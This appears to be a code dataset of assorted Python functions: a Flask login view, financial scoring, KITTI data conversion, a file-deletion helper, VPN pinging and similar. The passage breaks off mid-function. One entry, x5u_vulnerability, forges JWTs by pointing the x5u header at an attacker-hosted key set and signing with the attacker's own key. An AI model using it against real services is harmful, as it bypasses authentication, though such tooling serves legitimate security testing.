content (string, lengths 22 to 815k) | id (int64, 0 to 4.91M)
---|---
def poll_apple_subscription():
"""Poll Apple API to update AppleSubscription"""
# todo: only near the end of the subscription
for apple_sub in AppleSubscription.query.all():
user = apple_sub.user
verify_receipt(apple_sub.receipt_data, user, APPLE_API_SECRET)
verify_receipt(apple_sub.receipt_data, user, MACAPP_APPLE_API_SECRET)
LOG.d("Finish poll_apple_subscription")
| 5,700 |
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster R-CNN demo')
parser.add_argument('im', help="Input image", default= '000456.jpg')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--prototxt', dest='prototxt', help='Prototxt of Network')
parser.add_argument('--weights', dest='caffemodel', help='Weights of trained network')
    parser.add_argument('--labels', dest='labels', help='file containing labels',
default=None)
parser.add_argument('--cf', dest='min_cf', help='cutoff confidence score',
default=0.8, type=float)
parser.add_argument('--output',
dest='destination',
help='Output location of image detections',
default=None
)
args = parser.parse_args()
return args
| 5,701 |
def login():
"""The screen to log the user into the system."""
# call create_all to create database tables if this is the first run
db.create_all()
# If there are no users, create a default admin and non-admin
if len(User.query.all()) == 0:
create_default_users()
# Redirect the user if already logged in
if current_user.is_authenticated:
# Send admins and non-admins to different pages
if current_user.admin:
return redirect(url_for('admin.admin_home'))
else:
return redirect(url_for('export.export_home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None or not user.check_password(form.password.data):
flash("Invalid username or password")
return redirect(url_for('login.login'))
login_user(user)
current_app.logger.info(f"Logged in {user}")
# If the user was redirected here, send the user back to the original page
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
# If no next page given, default to these pages
if user.admin:
next_page = url_for('admin.admin_home')
else:
next_page = url_for('export.export_home')
return redirect(next_page)
nav_bar_title = "Login"
return render_template('login/login.html', title='Sign in', form=form, nav_bar_title=nav_bar_title)
| 5,702 |
def freight_sep_2014():
"""Find the number of freight of the month"""
for i in fetch_data_2014():
if i[1] == "Freight" and i[4] == "September":
num_0 = i[6]
return int(num_0)
| 5,703 |
def convexhull(
input_path: Union[str, "os.PathLike[Any]"],
output_path: Union[str, "os.PathLike[Any]"],
input_layer: Optional[str] = None,
output_layer: Optional[str] = None,
columns: Optional[List[str]] = None,
explodecollections: bool = False,
nb_parallel: int = -1,
batchsize: int = -1,
force: bool = False,
):
"""
Applies a convexhull operation on the input file.
The result is written to the output file specified.
Args:
input_path (PathLike): the input file
output_path (PathLike): the file to write the result to
input_layer (str, optional): input layer name. Optional if the input
file only contains one layer.
        output_layer (str, optional): output layer name. Optional if the output
            file only contains one layer.
columns (List[str], optional): If not None, only output the columns
specified. Defaults to None.
explodecollections (bool, optional): True to output only simple geometries.
Defaults to False.
nb_parallel (int, optional): the number of parallel processes to use.
Defaults to -1: use all available processors.
batchsize (int, optional): indicative number of rows to process per
batch. A smaller batch size, possibly in combination with a
smaller nb_parallel, will reduce the memory usage.
Defaults to -1: (try to) determine optimal size automatically.
force (bool, optional): overwrite existing output file(s).
Defaults to False.
"""
logger.info(f"Start convexhull on {input_path}")
return _geoops_sql.convexhull(
input_path=Path(input_path),
output_path=Path(output_path),
input_layer=input_layer,
output_layer=output_layer,
columns=columns,
explodecollections=explodecollections,
nb_parallel=nb_parallel,
batchsize=batchsize,
force=force,
)
| 5,704 |
def piotroski_f(df_cy,df_py,df_py2):
"""function to calculate f score of each stock and output information as dataframe"""
f_score = {}
tickers = df_cy.columns
for ticker in tickers:
ROA_FS = int(df_cy.loc["NetIncome",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2) > 0)
CFO_FS = int(df_cy.loc["CashFlowOps",ticker] > 0)
        ROA_D_FS = int(df_cy.loc["NetIncome",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2) > df_py.loc["NetIncome",ticker]/((df_py.loc["TotAssets",ticker]+df_py2.loc["TotAssets",ticker])/2))
CFO_ROA_FS = int(df_cy.loc["CashFlowOps",ticker]/df_cy.loc["TotAssets",ticker] > df_cy.loc["NetIncome",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2))
LTD_FS = int((df_cy.loc["LTDebt",ticker] + df_cy.loc["OtherLTDebt",ticker])<(df_py.loc["LTDebt",ticker] + df_py.loc["OtherLTDebt",ticker]))
CR_FS = int((df_cy.loc["CurrAssets",ticker]/df_cy.loc["CurrLiab",ticker])>(df_py.loc["CurrAssets",ticker]/df_py.loc["CurrLiab",ticker]))
DILUTION_FS = int(df_cy.loc["CommStock",ticker] <= df_py.loc["CommStock",ticker])
GM_FS = int((df_cy.loc["GrossProfit",ticker]/df_cy.loc["TotRevenue",ticker])>(df_py.loc["GrossProfit",ticker]/df_py.loc["TotRevenue",ticker]))
ATO_FS = int(df_cy.loc["TotRevenue",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2)>df_py.loc["TotRevenue",ticker]/((df_py.loc["TotAssets",ticker]+df_py2.loc["TotAssets",ticker])/2))
f_score[ticker] = [ROA_FS,CFO_FS,ROA_D_FS,CFO_ROA_FS,LTD_FS,CR_FS,DILUTION_FS,GM_FS,ATO_FS]
f_score_df = pd.DataFrame(f_score,index=["PosROA","PosCFO","ROAChange","Accruals","Leverage","Liquidity","Dilution","GM","ATO"])
return f_score_df
| 5,705 |
def evaluate_circuit(
instances: Dict[str, SType],
connections: Dict[str, str],
ports: Dict[str, str],
) -> SDict:
"""evaluate a circuit for the given sdicts."""
# it's actually easier working w reverse:
reversed_ports = {v: k for k, v in ports.items()}
block_diag = {}
for name, S in instances.items():
block_diag.update(
{(f"{name},{p1}", f"{name},{p2}"): v for (p1, p2), v in sdict(S).items()}
)
sorted_connections = sorted(connections.items(), key=_connections_sort_key)
all_connected_instances = {k: {k} for k in instances}
for k, l in sorted_connections:
name1, _ = k.split(",")
name2, _ = l.split(",")
connected_instances = (
all_connected_instances[name1] | all_connected_instances[name2]
)
for name in connected_instances:
all_connected_instances[name] = connected_instances
current_ports = tuple(
p
for instance in connected_instances
for p in set([p for p, _ in block_diag] + [p for _, p in block_diag])
if p.startswith(f"{instance},")
)
block_diag.update(_interconnect_ports(block_diag, current_ports, k, l))
for i, j in list(block_diag.keys()):
is_connected = i == k or i == l or j == k or j == l
is_in_output_ports = i in reversed_ports and j in reversed_ports
if is_connected and not is_in_output_ports:
del block_diag[i, j] # we're no longer interested in these port combinations
circuit_sdict: SDict = {
(reversed_ports[i], reversed_ports[j]): v
for (i, j), v in block_diag.items()
if i in reversed_ports and j in reversed_ports
}
return circuit_sdict
| 5,706 |
def main():
"""The function main() does the following:
    1. Creates a grid
    2. Tests connectivity between the start and end points
    3. If there is connectivity, finds and plots the found path
"""
grid = create_grid(DIMENSION, ALPHA)
grid_orig = []
grid_orig = copy.deepcopy(grid)
connected = True
if not search(0, 0, grid):
print("There is no solution")
connected = False
grid = grid_orig
if connected:
walls = get_walls(grid, DIMENSION)
print(walls)
start = (0, 0)
end = (DIMENSION-1, DIMENSION-1)
path = AStar()
path.init_grid(DIMENSION, DIMENSION, walls, start, end)
path.solve()
print(path.get_path())
moves = path.get_path()
for i in range(len(moves)):
grid[moves[i][0]][moves[i][1]] = 3
plot_function(grid, DIMENSION)
| 5,707 |
def canonical_smiles_from_smiles(smiles, sanitize = True):
"""
Apply canonicalisation with rdkit
Parameters
------------
smiles : str
sanitize : bool
        Whether to apply rdkit sanitisation, default yes.
Returns
---------
canonical_smiles : str
Returns None if canonicalisation fails
"""
try:
mol = Chem.MolFromSmiles(smiles, sanitize = sanitize)
mol.UpdatePropertyCache()
#mol = Chem.AddHs(mol)
Chem.GetSSSR(mol)
return Chem.MolToSmiles(mol,canonical=True, allHsExplicit=True, kekuleSmiles = False, allBondsExplicit = True, isomericSmiles = True)
    except Exception:
return None
| 5,708 |
def get_ref(struct, ref, leaf=False):
"""
Figure out if a reference (e.g., "#/foo/bar") exists within a
given structure and return it.
"""
if not isinstance(struct, dict):
return None
parts = ref_parts(ref)
result = {}
result_current = result
struct_current = struct
for part in parts:
if part not in struct_current:
return None
result_current[part] = {}
result_current = result_current[part]
struct_current = struct_current[part]
if leaf:
return struct_current
result_current.update(struct_current)
return result
| 5,709 |
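A minimal usage sketch for the get_ref helper above. The ref_parts helper is not shown here, so it is assumed that ref_parts("#/foo/bar") returns the path segments ["foo", "bar"].

doc = {"foo": {"bar": {"baz": 1}}}

# assumption: ref_parts("#/foo/bar") -> ["foo", "bar"]
print(get_ref(doc, "#/foo/bar", leaf=True))   # {'baz': 1}  (the referenced leaf)
print(get_ref(doc, "#/foo/bar"))              # {'foo': {'bar': {'baz': 1}}}  (nested structure)
print(get_ref(doc, "#/foo/missing"))          # None  (reference does not exist)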
def delete_files(dpath: str, label: str='') -> str:
"""
Delete all files except the files that have names matched with label
If the directory path doesn't exist return 'The path doesn't exist'
else return the string with the count of all files in the directory
and the count of deleted files.
Args:
dpath
Type: string
Description: Directory path
label
Type: string
            Description: Characters or a name that is matched against the names
                         of files in the directory. If a file name matches,
                         that file will not be deleted.
Returns:
Type: string
Description: The 'The path doesn't exist' string
or the string with the count of all files in the directory
and the count of deleted files.
"""
directory = os.path.abspath(dpath)
print(directory)
# Test whether the path exists
if not os.path.exists(dpath):
return "The path doesn't exist"
else:
# Make list of files
files = os.listdir(directory)
all_files_count = len(files)
delete_files_count = 0
for file in files:
if file.find(label) == -1:
                os.remove(os.path.join(directory, file))
delete_files_count += 1
return "All files: {} Delete files: {}".format(all_files_count, delete_files_count)
| 5,710 |
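A small usage sketch for delete_files above, run against a throwaway temporary directory so nothing real is removed; the file names are invented for illustration.

import pathlib
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    for name in ("keep_a.txt", "keep_b.txt", "other.txt"):
        pathlib.Path(tmp, name).touch()
    # files whose names contain "keep" survive, the rest are deleted
    print(delete_files(tmp, label="keep"))  # All files: 3 Delete files: 1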
def start():
"""This function initializes and saves the needed variables"""
start.nameList = [] # List to save the different names of the locators (their numbers)
start.locList = [] # List to save a reference to the locators themselves
start.locPosList = [] # List to save each of the position of the locators
start.jointList = [] # List to save a reference to each joint
start.armsValue = 1 # Number of arms selected by the user
| 5,711 |
def edit_maker_app(
operator,
app_maker_code,
app_name="",
app_url="",
developer="",
app_tag="",
introduction="",
add_user="",
company_code="",
):
"""
@summary: 修改 maker app
@param operator:操作者英文id
@param app_maker_code: maker app编码
@param app_name:app名称,可选参数,为空则不修改名称
@param app_url:app链接,可选参数,为空则不修改链接
@param developer: 填写开发者英文id列表,请用英文分号";"隔开, 可选参数,为空则不修改开发者
需传入修改后的所有开发者信息
@param app_tag: 可选 String 轻应用分类
@param introduction: 可选 String 轻应用描述
@param add_user: 冗余字段,多版本兼容
@param company_code: 冗余字段,多版本兼容
@return: {'result': True, 'message':u"APP Maker 修改成功"}
{'result': False, 'message':u"APP Maker 修改出错"}
"""
data = {
"bk_app_code": settings.APP_CODE,
"bk_app_secret": settings.SECRET_KEY,
"light_app_code": app_maker_code,
"app_name": app_name,
}
if app_url:
data["app_url"] = app_url
if developer:
data["developers"] = developer.split(",")
if app_tag:
data["app_tag"] = app_tag
if introduction:
data["introduction"] = introduction
resp = _request_paasv3_light_app_api(url=LIGHT_APP_API, method="patch", data=data)
return resp
| 5,712 |
def fifo():
"""
Returns a callable instance of the first-in-first-out (FIFO) prioritization
algorithm that sorts ASDPs by timestamp
Returns
-------
prioritize: callable
a function that takes an ASDP type name and a dict of per-type ASDPDB
metadata, as returned by `asdpdb.load_asdp_metadata_by_type`, and
returns a list of dicts containing ordered ASDPs with metadata (in the
format expected by `asdpdb.save_asdp_ordering`)
"""
def prioritize(asdp_type, metadata):
# Extract metadata entries
ids = metadata['asdp_id']
sue = metadata['sue']
ts = metadata['timestamp']
untransmitted = metadata['downlink_status']
n_untransmitted = np.sum(untransmitted)
if n_untransmitted == 0:
logger.info(f'No untransmitted {asdp_type} products to prioritize')
return []
size_bytes = metadata['asdp_size_bytes']
sue_per_byte = sue / size_bytes
# Fill in bad values with zeros
sue_per_byte[np.isnan(sue_per_byte)] = 0.0
sue_per_byte[np.isinf(sue_per_byte)] = 0.0
order = np.argsort(ts)
for cand_id in order:
if untransmitted[cand_id]:
logger.info(
f'Selected ASDP {ids[cand_id]}, '
f'initial SUE = {sue_per_byte[cand_id]:.2e}'
)
products = [
{
'asdp_id': ids[cand_id],
'initial_sue': sue[cand_id],
'final_sue': sue[cand_id],
'initial_sue_per_byte': sue_per_byte[cand_id],
'final_sue_per_byte': sue_per_byte[cand_id],
'size_bytes': size_bytes[cand_id],
'timestamp': ts[cand_id],
}
for cand_id in order
if untransmitted[cand_id]
]
return products
return prioritize
| 5,713 |
def super(d, t):
"""Pressure p and internal energy u of supercritical water/steam
as a function of density d and temperature t (deg C)."""
tk = t + tc_k
tau = tstar3 / tk
delta = d / dstar3
taupow = power_array(tau, tc3)
delpow = power_array(delta, dc3)
phidelta = nr3[0] * delpow[-1] + sum([n * i * delpow[i - 1] * taupow[j] for
(i, j, n) in zip(ir3, jr3, nr3)])
phitau = sum([n * delpow[i] * j * taupow[j - 1] for
(i, j, n) in zip(ir3, jr3, nr3)])
rt = rconst * tk
p = d * rt * delta * phidelta
u = rt * tau * phitau
return (p, u)
| 5,714 |
def ls(query=None, quiet=False):
"""List and count files matching the query and compute total file size.
Parameters
----------
query : dict, optional
(default: None)
quiet : bool, optional
Whether to suppress console output.
"""
tty.screen.status('Searching ...', mode='static')
if query is None:
query = CONFIG['GENERAL']['QUERY']
file_list = scihub.search(query, verbose=True)
size = 0.0
for f in file_list:
size += f['size']
if not quiet:
msg = 'Found {0:d} files ({1}).'.format(len(file_list),
utils.b2h(size))
logging.info(msg)
tty.screen.result(msg)
for f in file_list:
msg = '{:>8} {}'.format(utils.b2h(f['size']), f['filename'])
# tty.update(f['filename'],msg)
logging.info(f['filename'])
#
# Write file_list to JSON file
# so it can be read later by the get() and store() commands.
#
if 'OUT_FILE' in CONFIG['GENERAL'] and \
CONFIG['GENERAL']['OUT_FILE'] is not None:
with open(CONFIG['GENERAL']['OUT_FILE'], 'w') as f:
json.dump(file_list, f, default=str, indent=2)
return file_list
| 5,715 |
def test_count_with_skip(service):
"""Check getting $count with $skip"""
# pylint: disable=redefined-outer-name
responses.add(
responses.GET,
f"{service.url}/Employees/$count?$skip=12",
json=11,
status=200)
request = service.entity_sets.Employees.get_entities().skip(12).count()
assert isinstance(request, pyodata.v2.service.GetEntitySetRequest)
assert request.execute() == 11
| 5,716 |
def _create_full_gp_model():
"""
GP Regression
"""
full_gp_model = gpflow.models.GPR(
(Datum.X, Datum.Y),
kernel=gpflow.kernels.SquaredExponential(),
mean_function=gpflow.mean_functions.Constant(),
)
opt = gpflow.optimizers.Scipy()
opt.minimize(
full_gp_model.training_loss,
variables=full_gp_model.trainable_variables,
options=dict(maxiter=300),
)
return full_gp_model
| 5,717 |
def prime_factors(n, multiplicities=False):
"""
Generates the distinct prime factors of a positive integer n in an
ordered sequence. If the 'multiplicities' option is True then it
generates pairs of prime factors of n and their multiplicities
(largest exponent e such that p^e divides n for a prime factor p),
e.g. for n = 54 = 2^1 x 3^3 we have
54 -> 2, 3
54, multiplicities=True -> (2, 1), (3, 3)
This is precisely the prime factorisation of n.
"""
if n == 1:
return
if is_prime(n):
if not multiplicities:
yield n
else:
yield n, 1
return
i = 0
d = 2
ub = math.ceil(n / 2) + 1
while d <= ub:
q = n / d
if q.is_integer() and is_prime(d):
if i == 1:
ub = min(ub, q)
if not multiplicities:
yield d
else:
                # largest exponent e such that d**e divides n
                m = 1
                while n % (d ** (m + 1)) == 0:
                    m += 1
yield d, m
i += 1
d += 1
| 5,718 |
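A usage sketch for prime_factors above. The snippet depends on an is_prime helper that is not shown, so a simple trial-division stand-in is defined here; the expected output follows the 54 = 2^1 x 3^3 example from the docstring.

import math

def is_prime(k):
    # stand-in primality check, only for this sketch
    if k < 2:
        return False
    return all(k % i for i in range(2, math.isqrt(k) + 1))

print(list(prime_factors(54)))                       # [2, 3]
print(list(prime_factors(54, multiplicities=True)))  # [(2, 1), (3, 3)]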
def read_file_header(fd, endian):
"""Read mat 5 file header of the file fd.
Returns a dict with header values.
"""
fields = [
('description', 's', 116),
('subsystem_offset', 's', 8),
('version', 'H', 2),
('endian_test', 's', 2)
]
hdict = {}
for name, fmt, num_bytes in fields:
data = fd.read(num_bytes)
hdict[name] = unpack(endian, fmt, data)
hdict['description'] = hdict['description'].strip()
v_major = hdict['version'] >> 8
v_minor = hdict['version'] & 0xFF
hdict['__version__'] = '%d.%d' % (v_major, v_minor)
return hdict
| 5,719 |
def shape_padleft(t, n_ones=1):
"""Reshape `t` by left-padding the shape with `n_ones` 1s.
See Also
--------
shape_padaxis
shape_padright
Dimshuffle
"""
_t = aet.as_tensor_variable(t)
pattern = ["x"] * n_ones + [i for i in range(_t.type.ndim)]
return _t.dimshuffle(pattern)
| 5,720 |
def zad1(x):
"""
Функция выбирает все элементы, идущие за нулём.
Если таких нет, возвращает None.
Если такие есть, то возвращает их максимум.
"""
zeros = (x[:-1] == 0)
if np.sum(zeros):
elements_to_compare = x[1:][zeros]
return np.max(elements_to_compare)
return None
| 5,721 |
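A quick usage sketch for zad1 above (maximum of the elements that follow a zero).

import numpy as np

x = np.array([3, 0, 7, 0, 2, 5])
print(zad1(x))                    # 7  (elements after a zero are 7 and 2)
print(zad1(np.array([1, 2, 3])))  # None  (no zeros before the last element)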
def skopt_space(hyper_to_opt):
"""Create space of hyperparameters for the gaussian processes optimizer.
This function creates the space of hyperparameter following skopt syntax.
Parameters:
hyper_to_opt (dict): dictionary containing the configuration of the
hyperparameters to optimize. This dictionary must follow the next
syntax:
.. code:: python
            hyper_to_opt = {'hyperparam_1': {'type': ...,
                                             'range': ...,
                                             'step': ...},
                            'hyperparam_2': {'type': ...,
                                             'range': ...,
                                             'step': ...},
                            ...
                            }
        See the official documentation for more details.
Returns:
list: space of hyperparameters following the syntax required by the
gaussian processes optimization algorithm.
Example::
hyper_top_opt = {
'cnn_rnn_dropout':{
'type': 'uniform',
'range': [0,1]},
'optimizer_type':{
                'type': 'choice',
'range': ['Adadelta', 'Adam', 'RMSProp', 'SGD']},
'base_learning_rate':{
'type': 'loguniform',
'range': [-5, 0]},
'layer1_filters':{
'type': 'quniform',
'range': [16, 64],
'step': 1}}
Raises:
KeyError: if ``type`` is other than ``uniform``, ``quniform``,
``loguniform`` or ``choice``.
"""
space = []
# loop over the hyperparameters to optimize dictionary and add each
# hyperparameter to the space
for key, items in hyper_to_opt.items():
if items['type'] == 'uniform':
space.append(skopt.space.Real(items['range'][0],
items['range'][1],
name=key))
elif items['type'] == 'quniform':
space.append(skopt.space.Integer(items['range'][0],
items['range'][1],
name=key))
elif items['type'] == 'loguniform':
space.append(skopt.space.Real(items['range'][0],
items['range'][1],
name=key,
prior='log-uniform'))
elif items['type'] == 'choice':
space.append(skopt.space.Categorical(items['range'],
name=key))
else:
raise KeyError('The gaussian processes optimizer supports only \
uniform, quniform, loguniform and choice space types')
return space
| 5,722 |
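A usage sketch for skopt_space above, assuming scikit-optimize (skopt) is installed and imported as in the snippet; the hyperparameter names are taken from the docstring example.

import skopt  # scikit-optimize, already required by skopt_space above

hyper_to_opt = {
    "cnn_rnn_dropout": {"type": "uniform", "range": [0, 1]},
    "optimizer_type": {"type": "choice", "range": ["Adam", "SGD"]},
    "layer1_filters": {"type": "quniform", "range": [16, 64], "step": 1},
}
space = skopt_space(hyper_to_opt)
for dimension in space:
    print(dimension)  # Real / Categorical / Integer dimensions named after the keys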
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R2CNN network')
parser.add_argument('--img_dir', dest='img_dir',
help='images path',
default='/mnt/USBB/gx/DOTA/DOTA_clip/val/images/', type=str)
parser.add_argument('--image_ext', dest='image_ext',
help='image format',
default='.png', type=str)
parser.add_argument('--test_annotation_path', dest='test_annotation_path',
help='test annotate path',
default=cfgs.TEST_ANNOTATION_PATH, type=str)
parser.add_argument('--gpu', dest='gpu',
help='gpu index',
default='0', type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
| 5,723 |
def process_text_embedding(text_match, text_diff):
"""
Process text embedding based on embedding type during training and evaluation
Args:
text_match (List[str]/Tensor): For matching caption, list of captions for USE embedding and Tensor for glove/fasttext embeddings
text_diff (List[str]/Tensor): For non-matching caption, list of captions for USE embedding and Tensor for glove/fasttext embeddings
Returns:
text_match (Tensor): Processed text-embedding for matching caption
text_diff (Tensor): Processed text-embedding for non-matching caption
"""
if embed_type == 'use':
text_match = torch.tensor(use_embed(text_match).numpy())
text_diff = torch.tensor(use_embed(text_diff).numpy())
text_match = text_match.to(device)
text_diff = text_diff.to(device)
return text_match, text_diff
| 5,724 |
def compress_image(filename):
"""
Function to resize(compress) image to a given size
:param filename: Image to resize
:return: None
"""
    from PIL import Image  # Pillow imaging library, used here to resize the image
# open file to be compressed
img = Image.open(filename)
# compress the image accordingly
foo = img.resize((200, 200), Image.ANTIALIAS)
# save the downsized image
foo.save(filename, optimize=True, quality=100)
| 5,725 |
def x5u_vulnerability(jwt=None, url=None, crt=None, pem=None, file=None):
"""
    Check x5u vulnerability.
Parameters
----------
jwt: str
your jwt.
url: str
your url.
crt: str
crt path file
pem: str
pem file name
file: str
jwks file name
Returns
-------
str
your new jwt.
"""
if not is_valid_jwt(jwt):
raise InvalidJWT("Invalid JWT format")
if file is None:
file = "jwks_with_x5c.json"
jwt_json = jwt_to_json(jwt)
if "x5u" not in jwt_json[HEADER]:
raise InvalidJWT("Invalid JWT format JKU missing")
if crt is None or pem is None:
crt, pem = create_crt()
with open(crt) as f:
content = f.read()
f.close()
x5u = requests.get(jwt_json[HEADER]["x5u"]).json()
x5u["keys"][0]["x5c"] = (
content.replace("-----END CERTIFICATE-----", "")
.replace("-----BEGIN CERTIFICATE-----", "")
.replace("\n", "")
)
if ".json" not in file:
file += ".json"
if not url.endswith("/"):
url += "/"
jwt_json[HEADER]["x5u"] = f"{url}{file}"
f = open(file, "w")
f.write(json.dumps(x5u))
f.close()
s = encode_jwt(jwt_json)
key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())
priv = key.to_cryptography_key()
sign = priv.sign(
bytes(s, encoding="UTF-8"),
algorithm=hashes.SHA256(),
padding=padding.PKCS1v15(),
)
return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")
| 5,726 |
def test_failing_build_cmd(env: LlvmEnv, tmpdir):
"""Test that reset() raises an error if build command fails."""
(Path(tmpdir) / "program.c").touch()
benchmark = env.make_benchmark(Path(tmpdir) / "program.c")
benchmark.proto.dynamic_config.build_cmd.argument.extend(
["$CC", "$IN", "-invalid-cc-argument"]
)
benchmark.proto.dynamic_config.build_cmd.timeout_seconds = 10
with pytest.raises(
BenchmarkInitError,
match=r"clang: error: unknown argument: '-invalid-cc-argument'",
):
env.reset(benchmark=benchmark)
| 5,727 |
def from_kitti(
data_dir: str,
data_type: str,
) -> List[Frame]:
"""Function converting kitti data to Scalabel format."""
if data_type == "detection":
return from_kitti_det(data_dir, data_type)
frames = []
img_dir = osp.join(data_dir, "image_02")
label_dir = osp.join(data_dir, "label_02")
cali_dir = osp.join(data_dir, "calib")
oxt_dir = osp.join(data_dir, "oxts")
assert osp.exists(img_dir), f"Folder {img_dir} is not found"
vid_names = sorted(os.listdir(img_dir))
global_track_id = 0
for vid_name in vid_names:
trackid_maps: Dict[str, int] = {}
img_names = sorted(
[
f.path
for f in os.scandir(osp.join(img_dir, vid_name))
if f.is_file() and f.name.endswith("png")
]
)
projection = read_calib(cali_dir, int(vid_name))
if osp.exists(label_dir):
label_file = osp.join(label_dir, f"{vid_name}.txt")
labels_dict, trackid_maps, global_track_id = parse_label(
data_type, label_file, trackid_maps, global_track_id
)
for fr, img_name in enumerate(sorted(img_names)):
with Image.open(img_name) as img:
width, height = img.size
image_size = ImageSize(height=height, width=width)
fields = read_oxts(oxt_dir, int(vid_name))
poses = [KittiPoseParser(fields[i]) for i in range(len(fields))]
rotation = tuple(
R.from_matrix(poses[fr].rotation).as_euler("xyz").tolist()
)
position = tuple(
np.array(poses[fr].position - poses[0].position).tolist()
)
cam2global = Extrinsics(location=position, rotation=rotation)
intrinsics = Intrinsics(
focal=(projection[0][0], projection[1][1]),
center=(projection[0][2], projection[1][2]),
)
if osp.exists(label_dir):
            if fr not in labels_dict:
labels = []
else:
labels = labels_dict[fr]
else:
labels = []
img_name = data_type + img_name.split(data_type)[-1]
video_name = "/".join(img_name.split("/")[:-1])
f = Frame(
name=img_name.split("/")[-1],
videoName=video_name,
frameIndex=fr,
size=image_size,
extrinsics=cam2global,
intrinsics=intrinsics,
labels=labels,
)
frames.append(f)
return frames
| 5,728 |
def get_all_interactions(L, index_1=False):
"""
Returns a list of all epistatic interactions for a given sequence length.
    This sets the order used for beta coefficients throughout the code.
If index_1=True, then returns epistatic interactions corresponding to
1-indexing.
"""
if index_1:
pos = range(1, L+1)
else:
pos = range(L)
all_U = list(powerset(pos))
return all_U
| 5,729 |
def convertSVG(streamOrPath, name, defaultFont):
"""
Loads an SVG and converts it to a DeepSea vector image FlatBuffer format.
streamOrPath: the stream or path for the SVG file.
name: the name of the vector image used to decorate material names.
defaultFont: the default font to use.
The binary data is returned.
"""
svg = minidom.parse(streamOrPath)
materials = Materials(name)
commands = []
for rootNode in svg.childNodes:
if rootNode.nodeType != xml.dom.Node.ELEMENT_NODE:
continue
if rootNode.tagName == 'svg':
if rootNode.hasAttribute('viewBox'):
box = rootNode.getAttribute('viewBox').split()
if len(box) != 4:
raise Exception("Invalid view box '" + rootNode.getAttribute('viewbox') + "'")
if sizeFromString(box[0], 0.0) != 0.0 or sizeFromString(box[1], 0.0) != 0.0:
raise Exception("View box must have an origin of (0, 0)")
size = (sizeFromString(box[2], 0.0), sizeFromString(box[3], 0.0))
elif rootNode.hasAttribute('width') and rootNode.hasAttribute('height'):
size = (sizeFromString(rootNode.getAttribute('width'), 0.0),
sizeFromString(rootNode.getAttribute('height'), 0.0))
else:
raise Exception("No size set on SVG.")
diagonalSize = math.sqrt(size[0]*size[0] + size[1]*size[1])/math.sqrt(2)
for node in rootNode.childNodes:
if node.nodeType != xml.dom.Node.ELEMENT_NODE:
continue
if node.tagName == 'defs':
readMaterials(node, materials, size, diagonalSize)
else:
commands.extend(readShapes(node, defaultFont, materials, size, diagonalSize, \
Transform()))
break
builder = flatbuffers.Builder(0)
materials.write(builder)
commandOffsets = []
for command in commands:
commandOffsets.extend(command(builder))
VectorImage.StartCommandsVector(builder, len(commandOffsets))
for offset in reversed(commandOffsets):
builder.PrependUOffsetTRelative(offset)
commandsOffset = builder.EndVector()
VectorImage.Start(builder)
materials.writeToVectorImage(builder)
VectorImage.AddCommands(builder, commandsOffset)
VectorImage.AddSize(builder, CreateVector2f(builder, size[0], size[1]))
builder.Finish(VectorImage.End(builder))
return builder.Output()
| 5,730 |
def to_accumulo(df, config: dict, meta: dict, compute=True, scheduler=None):
"""
    Parallel write of Dask DataFrame to Accumulo Table
Parameters
----------
df : Dataframe
The dask.Dataframe to write to Accumulo
config : dict
Accumulo configuration to use to connect to accumulo
meta : dict
Data model to apply to dataframe
compute : bool
Should compute be called; immediately call write if True, delayed otherwise
scheduler : str
The scheduler to use, like “threads” or “processes”
Returns
-------
The number of Accumulo rows written if they were computed right away.
If not, the delayed tasks associated with the writing of the table
"""
dfs = df.to_delayed()
values = [delayed(pandas_write_dataframe)(config, d, meta) for d in dfs]
if compute:
return sum(delayed(values).compute(scheduler=scheduler))
else:
return values
| 5,731 |
def compute_euclidean_distance(x, y):
"""
    Computes the squared Euclidean distance (no square root is taken) between two TensorFlow tensors
"""
d = tf.reduce_sum(tf.square(x-y),axis=1,keep_dims=True)
return d
| 5,732 |
def vpn_ping(address, port, timeout=0.05, session_id=None):
"""Sends a vpn negotiation packet and returns the server session.
Returns False on a failure. Basic packet structure is below.
Client packet (14 bytes)::
0 1 8 9 13
+-+--------+-----+
|x| cli_id |?????|
+-+--------+-----+
x = packet identifier 0x38
cli_id = 64 bit identifier
? = unknown, probably flags/padding
Server packet (26 bytes)::
        0 1 8 9 13 14 21 22 25
+-+--------+-----+--------+----+
|x| srv_id |?????| cli_id |????|
+-+--------+-----+--------+----+
x = packet identifier 0x40
cli_id = 64 bit identifier
? = unknown, probably flags/padding
bit 9 was 1 and the rest were 0 in testing
"""
if session_id is None:
session_id = random.randint(0, 0xffffffffffffffff)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack("!BQxxxxxx", 0x38, session_id)
sock.sendto(data, (address, port))
sock.settimeout(timeout)
try:
received = sock.recv(2048)
except socket.timeout:
return False
finally:
sock.close()
fmt = "!BQxxxxxQxxxx"
if len(received) != struct.calcsize(fmt):
        print(struct.calcsize(fmt))
return False
(identifier, server_sess, client_sess) = struct.unpack(fmt, received)
if identifier == 0x40 and client_sess == session_id:
return server_sess
| 5,733 |
def setup_logging(default_path='logging.json',
                  level=None,
                  env_key='LOG_CFG'):
"""
Setup logging configuration
"""
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
if level:
config['root']['level'] = level
logging.config.dictConfig(config)
| 5,734 |
def is_admin():
"""Checks if author is a server administrator, or has the correct permission tags."""
async def predicate(ctx):
return (
# User is a server administrator.
ctx.message.channel.permissions_for(ctx.message.author).administrator
# User is a developer.
